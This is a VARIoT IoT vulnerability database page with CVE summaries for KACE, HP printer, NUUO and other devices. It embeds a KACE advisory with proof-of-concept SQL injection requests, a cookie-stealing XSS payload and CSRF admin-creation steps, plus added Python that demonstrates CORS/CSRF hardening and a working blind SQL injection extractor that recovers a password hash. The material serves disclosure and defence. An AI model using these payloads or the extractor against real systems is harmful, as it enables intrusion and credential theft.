VARIoT IoT vulnerabilities database
| VAR-201906-0485 | CVE-2019-12591 | NETGEAR Insight Cloud Command injection vulnerability in some firmware |
CVSS V2: 6.5 CVSS V3: 7.6 Severity: HIGH |
NETGEAR Insight Cloud with firmware before Insight 5.6 allows remote authenticated users to achieve command injection. NETGEAR Insight is a cloud-based management platform from NETGEAR. The platform supports setup and configuration of NETGEAR Insight managed access points, switches and ReadyNAS devices, among others. This vulnerability stems from the product not correctly filtering special elements when it constructs executable commands from externally supplied input. An authenticated attacker can exploit this vulnerability to execute arbitrary commands.
| VAR-201906-1268 | No CVE | FATEK WinProladder pdw project file has stack overflow vulnerability |
CVSS V2: 6.2 CVSS V3: - Severity: MEDIUM |
FATEK Automation (Yonghong Electric Co., Ltd.) is a company founded by a group of engineers engaged in PLC design and development.
FATEK WinProladder contains a stack-based buffer overflow vulnerability in its parsing of .pdw project files; an attacker who supplies a crafted project file can use it to execute malicious code.
| VAR-201906-1119 | CVE-2018-5405 | Quest Software Kace K1000 Appliance Cross-Site Scripting Vulnerability |
CVSS V2: 3.5 CVSS V3: 5.4 Severity: MEDIUM |
The Quest Kace K1000 Appliance, versions prior to 9.0.270, allows an authenticated least privileged user with 'User Console Only' rights to potentially inject arbitrary JavaScript code on the tickets page. Script execution could allow a malicious user of the system to steal session cookies of other users including Administrator and take over their session. This can further be exploited to launch other attacks. The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. An authenticated user with 'User Console Only' rights may inject arbitrary JavaScript, which could result in an attacker taking over a session of others, including an Administrator. The Quest Kace System Management (K1000) Appliance contains multiple vulnerabilities, including a blind SQL injection vulnerability and a stored cross site scripting vulnerability. It also suffers from misconfigurations in the cross-origin resource sharing (CORS) mechanism and improperly validates source communications. Quest Kace K1000 Appliance contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. Quest Software Kace K1000 Appliance is a system management appliance from Quest Software, USA. This product is mainly used for software license management, patch and endpoint security management, software distribution and server monitoring. A cross-site scripting vulnerability exists in versions of Quest Kace K1000 Appliance prior to 9.0.270 that could allow an attacker to execute client-side code.
# Exploit Title: [Dell Kace Appliance Multiple Vulnerabilities]
# Date: [12/04/2018]
# Exploit Author: [SlidingWindow], Twitter: @kapil_khot
# Vendor Homepage: [https://www.quest.com/products/kace-systems-management-appliance/]
# Affected Versions: [KACE SMA versions prior to 9.0.270 PATCH SEC2018_20180410]
# Tested on: [Quest Kace K1000 Appliance versions, 8.0.318, 8.0.320 and 9.0.270 ]
# CVE : [CVE-2018-5404,CVE-2018-5405,CVE-2018-5406]
#CERT Advisory: [https://www.kb.cert.org/vuls/id/877837/]
#Vendor Advisory: https://support.quest.com/kb/288310/cert-coordination-center-report-update
==================
#Product:-
==================
Quest KACE, formerly Dell KACE, is a company that specializes in computer appliances for systems management of information technology equipment.
========================
#Vulnerability Details:-
========================
=====================================================================================================================================================
1. Blind SQL Injection Vulnerability in Ajax_Lookup_List.PHP (CVE-2018-5404)
=====================================================================================================================================================
The Dell Kace allows Admin users to access ajax_lookup_list.php. However, it can be accessed by a least privileged user with 'User Console Only' rights. Also, the user input supplied to the 'selvalue' parameter is not sanitized, which leads to a Blind SQL Injection vulnerability.
#Proof-Of-Concept:
------------------
1. Send following request to the target:
GET /common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13&queue_id=1&limit=10&org_id=1&locale=en_US&id=13 HTTP/1.1
Host: 192.168.247.100
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://192.168.247.100/userui/ticket.php?QUEUE_ID=1
Cookie: kbox_nav=1; KACE_LAST_USER=%98%B59%CB%D9%27f+%28%B6%83b%0F8a%EF; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i0b4qhnv66qg41893hb1q5g146; KACE_CSRF_TOKEN=4862fbb6808731e6658aeca4ea48bd2cac08502ca289e1d3305875b165fb2c86d5441145152ada3f3c701cf2387db6086e7c349c5265ec3b2110978a70ebde6f; KONEA=ebWI%2BP%2FFEgmTioFCZ3xVTgsN174jAtY0mkDdAov5uZtJEpn2FziBYMEinZsmN63zlNfEooUtIXJDgiJgmSKfFk3VvQguPiEAYQIaYpMhcFRQkfyANLWQy2tJzS8mByjYxJZlBRcYhJYlVqAMppyuikdVPOQRynpbiRNSIqVlX0wyxIBFaoF4b8O09p4wYkritpr1qM%2BMoLmA2n3%2BQCY2u%2FvD8DdrIVtm8t2%2BNxMVCCZjfpqpjKef73l7xx2yBxlV9kRG04gPNHXFfv8f4TZB82%2FvurTFqgOWThxp51YjdpWfssEJQsss1O1B3FtYEH0h83Wrl9ABzsRx%2FZafVGjQTw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjozLCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6IjRkMzkwY2M2ODMzZTRkMjk4MTI0NzYyYmQwYjdiNzRjIiwiZXhwIjoxNTIxMzA3NTExfQ.S9h0USN7xS0VmeapB6zWqKnAW-e-vd9J9-NrH9383gSXX6K_vEgXSv0FpuPGCtYQ2I3o7gxuYBKxy_qCqp1xd2w2NRowiZb5_WlwoHBWeTnaP3D9Y6Ek4nd9CKgPaZF1Y8TtaZkdbbWWFTdjtpkD3CK5eNHX_lsqtPD_gVJWwxc
Connection: close
2. Make a note of Content-Length in the response body.
3. Send following request:
http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13'&queue_id=1&limit=10&org_id=1&locale=en_US&id=13
4. Response to above request shows that an error occurred and we are being redirected to /common/error.php
5. Final payload to check if we get the original response back:
http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13''&queue_id=1&limit=10&org_id=1&locale=en_US&id=13
6. These tests confirm that the 'selvalue' parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database.
=========================================================================================================================================================
2. Blind SQL Injection Vulnerability in Oval_Detail.PHP (CVE-2018-5404)
=========================================================================================================================================================
The Dell Kace allows Admin users to view OVAL templates via 'oval_detail.php', which can be accessed by a user with 'Read Only Administrator' rights. Also, the user input supplied to the ID parameter is not sanitized, which leads to a Blind SQL Injection vulnerability.
An authenticated user with ‘Read Only Administrator’ rights could exploit this vulnerability to retrieve sensitive information from the database.
#Proof-Of-Concept:
------------------
1. Send following request to the target:
GET /adminui/oval_detail.php?ID=6200 HTTP/1.1
Host: 192.168.247.100
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.247.100/adminui/oval_list.php
Cookie: kbox_nav=1; KACE_LAST_USER=%9A%95%91%5E%AF%B2%A6%FA%02M%B5%7D%08%87%D52; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i48m8gm8kcnbiptc28pq8u7uq1; KACE_CSRF_TOKEN=96acbdac36b0143958a7d96ba318eb5c626884d46733a8ed05c88cfe94d80cfdebe6bd9790ff4fec3a79fa988ff828dac4d841356c72eebb015d20c5ffd5a01a; KONEA=xvqV3k6fWuhsnypD45pPw4OPs7fZxUDP24mubodoYiSj8Y8EqJpUnakrq%2BHEefSs0YkzglNboWvUhE%2FuavTZZrkyNPMF1IH2QB%2FIF7jSm6fLukuuMyLgTFZWtOg16t5eJqCXvn0f54tfwFnfB1tobY%2Fu6MDe8BOWKaj6mByvdD6kNREg%2B%2FLwAcfIYmgJNKYu0Wd9JwsRpWpuRyZkejbrZB%2FSlkh80oHvHSey0inQmIy7B4bYnPCPUfTU8qPeZLaPcvYFchruj%2BabBazlHAaq44txeUy2AtG85ntiN8XPXoZnflHOD%2B5WjTywTtRGiRpCQVQNDbHTOdSUuljpDEyjrw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjo0LCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6ImVlMTk3ZGE5NmFmYTRiYzViYzk5Y2VhMzI3ZjQ2OTdiIiwiZXhwIjoxNTIxMjk3MzE5fQ.GHuAWu_mcviKl0HQcFjY0In5aJxgB-WZCaHP5XQMdpdboby0b1qnwh4DyC3TQg4PktBm_D0Vu4LOMY5KWGRvwOQCTwrzBFLg3ogsKWb0AMO3RArrENXxEO3P3K6XFQCEIlpU9n9K1APnnRSTsfPEL7GC5GkzixakXAlZMZzLB_0
Connection: close
Upgrade-Insecure-Requests: 1
2. Response to above request shows some content with the content length of 32109 bytes:
3. It shows information about OVAL-ID#24253:
4. Now send following payload that tests this ID parameter for a true condition:
http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6432
5. Response to above request again shows information about the same OVAL-ID#24252:
6. Now, use following payload to test this ID parameter for a false condition:
http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6444
7. The response to false condition is different than the response to normal and/or true condition. This response does not show any information about any OVAL-ID:
8. These tests confirm that the ID parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database.
=========================================================================================================================================================
3. Stored Cross-Site Scripting Vulnerability in Ticket Summary (CVE-2018-5405)
=========================================================================================================================================================
This script executes every time a user visits this page.
#Proof-Of-Concept:
------------------
1. Log into the Dell Kace K1000 web interface as a least privileged user.
2. Navigate to Service Desk-->Tickets and create a new ticket.
3. Inject following payload in the Summary section:
Test Ticket</textarea></div></div><script>alert("XSSinSummary");alert(document.cookie);</script><!--
4. Save the ticket.
5. Go back to tickets and view this newly created ticket and a couple of alert boxes should pop up.
=========================================================================================================================================================
4. Misconfigured CORS Vulnerability (CVE-2018-5406)
=========================================================================================================================================================
The Dell Kace K1000 fails to implement Cross Origin Resource Sharing (CORS) properly, which leads to a Cross Site Request Forgery (CSRF) attack.
An unauthenticated, remote attacker could exploit this vulnerability to perform sensitive actions such as adding a new administrator account or changing the appliance's settings. Also, a malicious internal user of the organization could induce an administrator of this appliance to visit a malicious link that exploits this vulnerability to perform sensitive actions such as adding a new administrator account or changing the appliance's settings.
#Proof-Of-Concept:
------------------
1. Try to create a new user and capture the request in BurpSuite to create a CSRF PoC from there. Create an HTML form and put it under Web Root of your Kali machine.
2. Log into the web interface of the appliance as admin.
3. Open a new tab in the same browser and access the HTML page from #1
4. Save the ticket.
5. Submit the request (This can be modified to submit the request automatically).
6. Check BurpSuite to see if the request to add user ‘Hacker’ was sent to the appliance and if it was originated from your Kali machine
7. Check the admin console to see if user Hacker has been added:
===================================
#Vulnerability Disclosure Timeline:
===================================
04/2018: Submitted report to CERT-US.
04/2018: CERT-US reported the issue to vendor.
05/2018: Awaiting vendor response.
10/2018: Vendor asked to test the patch as they have fixed these issues already.
10/2018: Confirmed that all the vulnerabilities except Vulnerability#2 are fixed in 9.0.270, and that it still exists in the other patched version.
01/2019: Vendor confirmed that they are working on fixing all of the vulnerabilities and would release a patch on May 01 2019 and asked to publish this on June 01 2019 so that customers have enough time to patch.
05/2019: Vendor published an advisory.
06/2019: CERT-US published a Vulnerability Note, VU#877837
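The CORS/CSRF finding above (section 4 of the advisory) works because the appliance accepts a state-changing request on the strength of the session cookie alone, and a browser attaches that cookie to a form post from any site; a CORS policy that reflects arbitrary origins with credentials additionally lets the attacker's JavaScript read the responses. The following Python is an added example, not code from the KACE appliance, the advisory or the VARIoT record; the appliance origin, header names and session layout are assumptions. It puts the reflecting CORS policy beside an allowlisted one, and shows the server-side checks (Origin or Referer pinned to the appliance, plus a per-session token carried in the form body) under which the advisory's cross-site "add user 'Hacker'" post is refused.

```python
"""Origin handling on a state-changing endpoint: the misconfiguration beside the fix.

Added example, not code from the KACE appliance or the advisory. The appliance
origin, header names and the session dict are assumptions for illustration.
"""
import hmac
import secrets
from urllib.parse import urlsplit

APPLIANCE_ORIGIN = "https://kace.example.internal"   # assumed deployment origin
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def cors_headers_vulnerable(headers: dict) -> dict:
    """Echoes the caller's Origin with credentials enabled: every origin is trusted,
    so another site's script can send authenticated requests and read the replies."""
    origin = headers.get("Origin")
    if origin is None:
        return {}
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true"}


def cors_headers_fixed(headers: dict, allowed=frozenset({APPLIANCE_ORIGIN})) -> dict:
    """Exact-match allowlist. Unknown origins get no CORS headers at all, and the
    wildcard is never combined with credentials."""
    origin = headers.get("Origin")
    if origin not in allowed:
        return {}
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin"}


def request_origin(headers: dict):
    """Origin header when present, otherwise scheme://host[:port] of the Referer.
    None when neither is available; the caller treats that as untrusted."""
    if headers.get("Origin"):
        return headers["Origin"]
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        if parts.scheme and parts.netloc:
            return f"{parts.scheme}://{parts.netloc}"
    return None


def new_session(is_admin: bool) -> dict:
    """Server-side session record; the CSRF token is bound to this session."""
    return {"is_admin": is_admin, "csrf_token": secrets.token_hex(32)}


def add_user_allowed(method: str, headers: dict, form: dict, session: dict,
                     enforce_csrf: bool = True) -> bool:
    """Decides whether a user-creation request may proceed.

    enforce_csrf=False reproduces an endpoint that trusts the session cookie alone;
    the browser attaches that cookie to a cross-site form post, so the attacker's
    page in the advisory succeeds against it. With the checks on, the request must
    be a non-safe method, come from the appliance's own origin, and carry the
    session's token in the body (a cross-site form cannot know or read it)."""
    if not session.get("is_admin"):
        return False
    if not enforce_csrf:
        return True
    if method in SAFE_METHODS:
        return False                       # never mutate state on GET
    if request_origin(headers) != APPLIANCE_ORIGIN:
        return False                       # cross-site or originless request
    supplied = form.get("csrf_token", "")
    expected = session.get("csrf_token", "")
    return hmac.compare_digest(supplied.encode(), expected.encode())


if __name__ == "__main__":
    admin = new_session(is_admin=True)
    # Constructed cross-site request: the admin's browser submitting the attacker's
    # form. The session cookie rides along automatically; the Origin does not match.
    cross_site = {"Origin": "http://attacker.example",
                  "Referer": "http://attacker.example/csrf.html"}
    print("legacy endpoint:  ", add_user_allowed("POST", cross_site, {"name": "Hacker"}, admin, enforce_csrf=False))
    print("hardened endpoint:", add_user_allowed("POST", cross_site, {"name": "Hacker"}, admin))
    print("CORS reflected:   ", cors_headers_vulnerable(cross_site))
    print("CORS allowlisted: ", cors_headers_fixed(cross_site))
```

The Origin check alone is not sufficient on its own either: a browser omits Origin on some same-site navigations and older clients omit Referer, so the token check is what the decision ultimately rests on, and the Origin check is a cheap first filter that also blocks the reflected-CORS case where script on another site can read the appliance's responses.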
| VAR-201906-1118 | CVE-2018-5404 | Quest Software Kace K1000 Appliance SQL Injection Vulnerability |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
The Quest Kace K1000 Appliance, versions prior to 9.0.270, allows an authenticated, remote attacker with least privileges ('User Console Only' role) to potentially exploit multiple Blind SQL Injection vulnerabilities to retrieve sensitive information from the database or copy the entire database. An authenticated remote attacker could leverage Blind SQL injections to obtain sensitive data. The Quest Kace System Management (K1000) Appliance contains multiple vulnerabilities, including a blind SQL injection vulnerability and a stored cross site scripting vulnerability. It also suffers from misconfigurations in the cross-origin resource sharing (CORS) mechanism and improperly validates source communications. Quest Software Kace K1000 Appliance is a system management appliance from Quest Software, USA. This product is mainly used for software license management, patch and endpoint security management, software distribution and server monitoring.
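The two probe sequences in the SlidingWindow advisory above (sections 1 and 2: a stray quote that produces the error redirect; a TRUE condition that reproduces the baseline page and a FALSE condition that does not) form a boolean-based blind oracle, and the same oracle is what a tool like sqlmap drives to pull data out, which is the impact this CVE-2018-5404 record describes. The following Python is an added example, not code from the VARIoT record, the advisory or the KACE appliance: it emulates oval_detail.php?ID=... against an in-memory SQLite table whose name, columns and rows are constructed here (not KACE's real schema), runs the advisory's probes against the vulnerable handler and against a parameterised one, and then extracts a row one character at a time through the oracle.

```python
"""Boolean-based blind SQL injection: the advisory's probes as an oracle, plus extraction.

Added example, not code from the KACE appliance or the advisory. The tables,
rows and page bodies below are constructed for illustration only.
"""
import sqlite3

ERROR_PAGE = "HTTP/1.1 302 Found\r\nLocation: /common/error.php\r\n"

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE oval_definition (id INTEGER PRIMARY KEY, oval_id TEXT, title TEXT);
    INSERT INTO oval_definition VALUES (6200, 'oval:org.mitre.oval:def:24253', 'Constructed OVAL row');
    CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT);
    INSERT INTO users VALUES (1, 'admin', '$2y$10$constructedhash');
""")


def oval_detail_vulnerable(id_param: str) -> str:
    """Emulates the vulnerable endpoint: the ID parameter is concatenated into SQL.
    A query that fails to parse yields the redirect the advisory observed."""
    try:
        row = conn.execute(
            "SELECT oval_id, title FROM oval_definition WHERE id = " + id_param
        ).fetchone()
    except sqlite3.Error:
        return ERROR_PAGE
    if row is None:
        return "<html><body>No OVAL definition found</body></html>"
    return f"<html><body><h1>{row[0]}</h1><p>{row[1]}</p></body></html>"


def oval_detail_fixed(id_param: str) -> str:
    """Hardened handler: the ID is type-checked and bound as a parameter, so any
    appended SQL is either rejected up front or treated as data, never as code."""
    try:
        row = conn.execute(
            "SELECT oval_id, title FROM oval_definition WHERE id = ?", (int(id_param),)
        ).fetchone()
    except (ValueError, sqlite3.Error):
        return ERROR_PAGE
    if row is None:
        return "<html><body>No OVAL definition found</body></html>"
    return f"<html><body><h1>{row[0]}</h1><p>{row[1]}</p></body></html>"


def breaks_on_quote(fetch, base: str) -> bool:
    """Advisory steps 3-4 of vuln #1: a single quote turns a normal page into the
    error redirect. Only a hint: a strict input validator answers the same way."""
    return fetch(base) != ERROR_PAGE and fetch(base + "'") == ERROR_PAGE


def is_boolean_blind(fetch, base: str) -> bool:
    """Advisory steps 4-7 of vuln #2: a TRUE condition must reproduce the baseline
    page and a FALSE condition must differ from it; both together rule out noise."""
    baseline = fetch(base)
    true_page = fetch(f"{base} AND 6432=6432")
    false_page = fetch(f"{base} AND 6432=6444")
    return true_page == baseline and false_page != baseline


def extract(fetch, base: str, subquery: str, max_len: int = 64) -> str:
    """Reads the single-value result of `subquery` through the oracle: a length
    probe per position, then a binary search over printable ASCII using SQLite's
    unicode()/substr(). Roughly eight requests per recovered character."""
    baseline = fetch(base)

    def truthy(cond: str) -> bool:
        return fetch(f"{base} AND ({cond})") == baseline

    out = []
    for pos in range(1, max_len + 1):
        if not truthy(f"length(({subquery})) >= {pos}"):
            break
        lo, hi = 32, 126                      # the code point lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if truthy(f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    print("quote breaks query (vulnerable):", breaks_on_quote(oval_detail_vulnerable, "6200"))
    print("boolean blind (vulnerable):     ", is_boolean_blind(oval_detail_vulnerable, "6200"))
    print("boolean blind (fixed):          ", is_boolean_blind(oval_detail_fixed, "6200"))
    print("extracted:", extract(oval_detail_vulnerable, "6200",
                                "SELECT name || ':' || password FROM users WHERE id = 1"))
```

The quote probe on its own is not a confirmation: the parameterised handler also answers the quote with the error page, because int() rejects it, which is exactly why the advisory pairs a TRUE and a FALSE condition before calling the parameter injectable. Against a MySQL backend the extraction loop would use ascii()/substring() in place of unicode()/substr(); the oracle itself is unchanged.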
| VAR-201906-0401 | CVE-2019-6326 | HP Color LaserJet Pro M280-M281 and MFP M28-M31 Multifunction Printer Series buffer error vulnerability |
CVSS V2: 6.5 CVSS V3: 7.2 Severity: HIGH |
HP Color LaserJet Pro M280-M281 Multifunction Printer series (before v. 20190419), HP LaserJet Pro MFP M28-M31 Printer series (before v. 20190426) may have embedded web server attributes which may be potentially vulnerable to Buffer Overflow. HP Color LaserJet Pro M280-M281 Multifunction Printer series and HP LaserJet Pro MFP M28-M31 Printer series are HP printer products. A buffer overflow vulnerability exists in HP Color LaserJet Pro M280-M281 Multifunction Printer series firmware prior to 20190419 and HP LaserJet Pro MFP M28-M31 Printer series firmware prior to 20190426. The vulnerability stems from the product not properly validating data boundaries when operating on memory, so that reads and writes land on other, associated memory locations. An attacker could exploit the vulnerability to cause a buffer overflow or heap overflow. The affected printers are prone to the following vulnerabilities:
1. A cross-site scripting vulnerability
2. A cross-site request forgery vulnerability
3. An HTML-injection vulnerability
4. Multiple buffer-overflow vulnerabilities
An attacker may leverage these issues to execute arbitrary script code in the browser of the victim in the context of the affected site, steal cookie-based authentication credentials, execute arbitrary code within the context of the affected device
| VAR-201906-0400 | CVE-2019-6325 | HP Color LaserJet Pro M280-M281 and MFP M28-M31 Multifunction Printer Series cross-site request forgery vulnerability |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
HP Color LaserJet Pro M280-M281 Multifunction Printer series (before v. 20190419), HP LaserJet Pro MFP M28-M31 Printer series (before v. 20190426) may have an embedded web server that is potentially vulnerable to Cross-site Request Forgery. The HP Color LaserJet Pro M280-M281 and MFP M28-M31 Multifunction Printer series contain a cross-site request forgery vulnerability. Information may be obtained or altered, and a denial-of-service (DoS) condition may result. HP Color LaserJet Pro M280-M281 Multifunction Printer series and HP LaserJet Pro MFP M28-M31 Printer series are HP printer products. The vulnerability stems from the web application not fully verifying that a request came from a trusted user. An attacker could exploit the vulnerability to send unexpected requests to the server through an affected client. The affected printers are prone to the following vulnerabilities:
1. A cross-site scripting vulnerability
2. A cross-site request forgery vulnerability
3. An HTML-injection vulnerability
4. Multiple buffer-overflow vulnerabilities
An attacker may leverage these issues to execute arbitrary script code in the browser of the victim in the context of the affected site, steal cookie-based authentication credentials, execute arbitrary code within the context of the affected device
| VAR-201906-0399 | CVE-2019-6324 | HP Color LaserJet Pro M280-M281 and MFP M28-M31 Multifunction Printer Series cross-site scripting vulnerability |
CVSS V2: 3.5 CVSS V3: 4.8 Severity: MEDIUM |
HP Color LaserJet Pro M280-M281 Multifunction Printer series (before v. 20190419), HP LaserJet Pro MFP M28-M31 Printer series (before v. 20190426) may have an embedded web server potentially vulnerable to stored XSS in wireless configuration page. HP Color LaserJet Pro M280-M281 Multifunction Printer series and HP LaserJet Pro MFP M28-M31 Printer series are HP printer products. A stored cross-site scripting vulnerability exists in the wireless configuration page of HP Color LaserJet Pro M280-M281 Multifunction Printer series firmware prior to 20190419 and HP LaserJet Pro MFP M28-M31 Printer series firmware prior to 20190426. The vulnerability stems from the web application not properly validating client-supplied data. An attacker could exploit it to execute client-side script in a victim's browser. The affected printers are prone to the following vulnerabilities:
1. A cross-site scripting vulnerability
2. A cross-site request forgery vulnerability
3. An HTML-injection vulnerability
4. Multiple buffer-overflow vulnerabilities
An attacker may leverage these issues to execute arbitrary script code in the browser of the victim in the context of the affected site, steal cookie-based authentication credentials, execute arbitrary code within the context of the affected device
| VAR-201906-0396 | CVE-2019-6323 | HP Color LaserJet Pro M280-M281 and MFP M28-M31 Multifunction Printer Series cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
HP Color LaserJet Pro M280-M281 Multifunction Printer series (before v. 20190419), HP LaserJet Pro MFP M28-M31 Printer series (before v. 20190426) may have an embedded web server potentially vulnerable to reflected XSS in wireless configuration page. HP Color LaserJet Pro M280-M281 Multifunction Printer series and HP LaserJet Pro MFP M28-M31 Printer series are HP printer products. A reflected cross-site scripting vulnerability exists in the wireless configuration page of HP Color LaserJet Pro M280-M281 Multifunction Printer series firmware prior to 20190419 and HP LaserJet Pro MFP M28-M31 Printer series firmware prior to 20190426. The vulnerability stems from the web application not properly validating client-supplied data. An attacker could exploit it to execute client-side script in a victim's browser. The affected printers are prone to the following vulnerabilities:
1. A cross-site scripting vulnerability
2. A cross-site request forgery vulnerability
3. An HTML-injection vulnerability
4. Multiple buffer-overflow vulnerabilities
An attacker may leverage these issues to execute arbitrary script code in the browser of the victim in the context of the affected site, steal cookie-based authentication credentials, execute arbitrary code within the context of the affected device
| VAR-201906-0402 | CVE-2019-6327 | HP Color LaserJet Pro M280-M281 and MFP M28-M31 Multifunction Printer Series buffer error vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
HP Color LaserJet Pro M280-M281 Multifunction Printer series (before v. 20190419), HP LaserJet Pro MFP M28-M31 Printer series (before v. 20190426) may have an IPP Parser potentially vulnerable to Buffer Overflow. HP Color LaserJet Pro M280-M281 Multifunction Printer series and HP LaserJet Pro MFP M28-M31 Printer series are HP printer products. A buffer overflow vulnerability exists in the IPP parser of HP Color LaserJet Pro M280-M281 Multifunction Printer series firmware prior to 20190419 and HP LaserJet Pro MFP M28-M31 Printer series firmware prior to 20190426. The vulnerability stems from the product not properly validating data boundaries when operating on memory, so that reads and writes land on other, associated memory locations. An attacker could exploit the vulnerability to cause a buffer overflow or heap overflow. The affected printers are prone to the following vulnerabilities:
1. A cross-site scripting vulnerability
2. A cross-site request forgery vulnerability
3. An HTML-injection vulnerability
4. Multiple buffer-overflow vulnerabilities
An attacker may leverage these issues to execute arbitrary script code in the browser of the victim in the context of the affected site, steal cookie-based authentication credentials, execute arbitrary code within the context of the affected device
| VAR-201905-0055 | CVE-2019-9105 | SAET Impianti Speciali TEBE Small Device and WebApp Vulnerable to information disclosure |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
The WebApp v04.68 in the supervisor on SAET Impianti Speciali TEBE Small 05.01 build 1137 devices allows remote attackers to make several types of API calls without authentication, as demonstrated by retrieving password hashes via an inc/utils/REST_API.php?command=CallAPI&customurl=alladminusers call. SAET Impianti Speciali TEBE Small devices and WebApp contain an information disclosure vulnerability. Information may be obtained. WebApp is one of the device's web-based management programs. Attackers can exploit this vulnerability to make various API calls without authentication.
| VAR-201905-0220 | CVE-2019-12502 | MOBOTIX S14 Cross-site request forgery vulnerability in camera |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
There is a lack of CSRF countermeasures on MOBOTIX S14 MX-V4.2.1.61 cameras, as demonstrated by adding an admin account via the /admin/access URI. The MOBOTIX S14 camera contains a cross-site request forgery vulnerability. Information may be obtained or altered, and a denial-of-service (DoS) condition may result. MOBOTIX S14 is a network camera produced by the German company MOBOTIX. There is a cross-site request forgery vulnerability in MOBOTIX S14 MX-V4.2.1.61. The vulnerability stems from the web application not adequately verifying that a request comes from a trusted user. An attacker could exploit this vulnerability to send unexpected requests to the server through an affected client.
| VAR-201905-0056 | CVE-2019-9106 | SAET Impianti Speciali TEBE Small Device and WebApp Path traversal vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
The WebApp v04.68 in the supervisor on SAET Impianti Speciali TEBE Small 05.01 build 1137 devices allows remote attackers to execute or include local .php files, as demonstrated by menu=php://filter/convert.base64-encode/resource=index.php to read index.php. SAET Impianti Speciali TEBE Small devices and WebApp contain a path traversal vulnerability. Information may be obtained or altered, and a denial-of-service (DoS) condition may result. SAET Impianti Speciali TEBE Small is a physical access control system from the Italian company SAET. WebApp is one of the device's web-based management programs. A local file inclusion vulnerability exists in WebApp v04.68 in SAET Impianti Speciali TEBE Small 05.01 build 1137: the menu parameter is passed to a PHP include without restriction, so a php://filter stream wrapper can be supplied to read the source of local .php files, or other local .php files can be included and executed.
| VAR-201905-0028 | CVE-2019-6725 | ZyXEL P-660HN-T1 V2 Vulnerabilities related to the use of hard-coded credentials |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
The rpWLANRedirect.asp ASP page is accessible without authentication on ZyXEL P-660HN-T1 V2 (2.00(AAKK.3)) devices. After accessing the page, the admin user's password can be obtained by viewing the HTML source code, and the interface of the modem can be accessed as admin. ZyXEL P-660HN-T1 V2 contains a vulnerability related to the use of hard-coded credentials. Information may be obtained or altered, and a denial-of-service (DoS) condition may result. ZyXEL P-660HN-T1 is a modem manufactured by ZyXEL, Taiwan, China.
| VAR-201905-0209 | CVE-2019-9653 | NUUO Network Video Recorder Firmware Command injection vulnerability |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
NUUO Network Video Recorder Firmware 1.7.x through 3.3.x allows unauthenticated attackers to execute arbitrary commands via shell metacharacters to handle_load_config.php. NUUO Network Video Recorder Firmware contains a command injection vulnerability. Information may be obtained or altered, and a denial-of-service (DoS) condition may result. NUUO Network Video Recorder (NVR) is a network video recorder from NUUO Corporation of Taiwan, China. A security vulnerability exists in NUUO NVR firmware versions 1.7.x through 3.3.x.
| VAR-201905-0064 | CVE-2019-9871 | Jector Smart TV FM-K75 Vulnerabilities related to authorization, authority, and access control in devices |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
